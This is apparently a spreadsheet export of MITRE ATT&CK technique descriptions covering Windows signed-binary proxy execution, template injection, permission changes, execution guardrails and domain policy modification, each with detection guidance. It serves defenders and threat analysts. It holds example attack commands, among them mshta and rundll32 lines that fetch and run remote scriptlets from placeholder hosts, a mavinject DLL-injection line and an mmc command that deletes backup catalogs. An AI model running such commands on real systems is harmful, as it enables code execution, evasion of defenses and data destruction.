    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/003</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</si>
  <si>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</si>
  <si>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Nik Seetharaman, Palantir; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: InstallUtil</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/004</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</si>
  <si>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</si>
  <si>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Casey Smith; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Mshta</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/005</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</si>
  <si>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</si>
  <si>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@ionstorm; Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Msiexec</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>24 January 2020</t>
  </si>
  <si>
    <t>07 June 2021</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</si>
  <si>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</si>
  <si>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Alexandros Pappas; Ziv Kaspersky, Cymptom</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Odbcconf</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Regsvr32</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/010</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</si>
  <si>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</si>
  <si>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Signed Binary Proxy Execution: Rundll32</t>
  </si>
  <si>
    <t>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction&lt;/code&gt;, rundll32.exe would first attempt to execute &lt;code&gt;ExampleFunctionW&lt;/code&gt;, or failing that &lt;code&gt;ExampleFunctionA&lt;/code&gt;, before loading &lt;code&gt;ExampleFunction&lt;/code&gt;). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending &lt;code&gt;W&lt;/code&gt; and/or &lt;code&gt;A&lt;/code&gt; to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/011</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</si>
  <si>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</si>
  <si>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Casey Smith; Gareth Phillips, Seek Ltd.; Ricardo Dias</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Verclsid</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>10 August 2020</t>
  </si>
  <si>
    <t>19 August 2020</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t>Rodrigo Garcia, Red Canary</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Mavinject</t>
  </si>
  <si>
    <t>Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. &lt;code&gt;C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. 
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  &lt;code&gt;/HMODULE&lt;/code&gt; command-line parameter (ex. &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>22 September 2021</t>
  </si>
  <si>
    <t>Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.
Adversaries may rename abusable binaries to evade detections, but the argument &lt;code&gt;INJECTRUNNING&lt;/code&gt; is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: MMC</t>
  </si>
  <si>
    <t>Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, &lt;code&gt;mmc C:\Users\foo\admintools.msc /a&lt;/code&gt; will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is &lt;code&gt;mmc gpedit.msc&lt;/code&gt;, which will open the Group Policy Editor application window. 
Adversaries may use MMC commands to perform malicious tasks. For example, &lt;code&gt;mmc wbadmin.msc delete catalog -quiet&lt;/code&gt; deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: &lt;code&gt;wbadmin.msc&lt;/code&gt; may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: &lt;code&gt;mmc.exe -Embedding C:\path\to\test.msc&lt;/code&gt;.(Citation: abusing_com_reg)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/014</t>
  </si>
  <si>
    <t>28 September 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. 
Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as &lt;code&gt;services.msc&lt;/code&gt; or &lt;code&gt;eventvwr.msc&lt;/code&gt;. Invoking non-Microsoft .msc files may be an indicator of malicious activity. </t>
  </si>
  <si>
    <t>Wes Hurd</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as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Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>17 October 2018</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</si>
  <si>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</si>
  <si>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Avneet Singh; Casey Smith; Praetorian</t>
  </si>
  <si>
    <t>Microsoft Core XML Services (MSXML) or access to wmic.exe</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts.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 (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: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 (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>29 April 2020</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Brian Wiltse @evalstrings; Patrick Campbell, @pjcampbe11</t>
  </si>
  <si>
    <t>Static File Analysis</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>13 September 2021</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</si>
  <si>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</si>
  <si>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CrowdStrike Falcon OverWatch; Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>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Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>04 February 2020</t>
  </si>
  <si>
    <t>01 September 2020</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</si>
  <si>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</si>
  <si>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File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification</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</si>
  <si>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Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify 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Commonly abused command arguments include &lt;code&gt;chmod +x&lt;/code&gt;, &lt;code&gt;chmod -R 755&lt;/code&gt;, and &lt;code&gt;chmod 777&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques) 
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.</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</si>
  <si>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campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails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guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>31 January 2019</t>
  </si>
  <si>
    <t>09 June 2021</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Nick Carr, Mandiant</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static file analysis</t>
  </si>
  <si>
    <t>Execution Guardrails: Environmental Keying</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity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environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>14 February 2019</t>
  </si>
  <si>
    <t>17 September 2020</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</si>
  <si>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</si>
  <si>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Dave Westgard; Elia Florio, Microsoft; Mnemonic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.
With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484</t>
  </si>
  <si>
    <t>07 March 2019</t>
  </si>
  <si>
    <t>It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). 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ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)</t>
  </si>
  <si>
    <t>Azure AD, Windows</t>
  </si>
  <si>
    <t>File system access controls, System access controls</t>
  </si>
  <si>
    <t>Domain Policy Modification: Group Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>28 December 2020</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</si>
  <si>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</si>
  <si>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Itamar Mizrahi, Cymptom; Tristan Bennett, Seamless Intelligence</t>
  </si>
  <si>
    <t>Domain Policy Modification: Domain Trust Modification</t>
  </si>
  <si>
    <t>Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.</t>
  </si>
  <si>
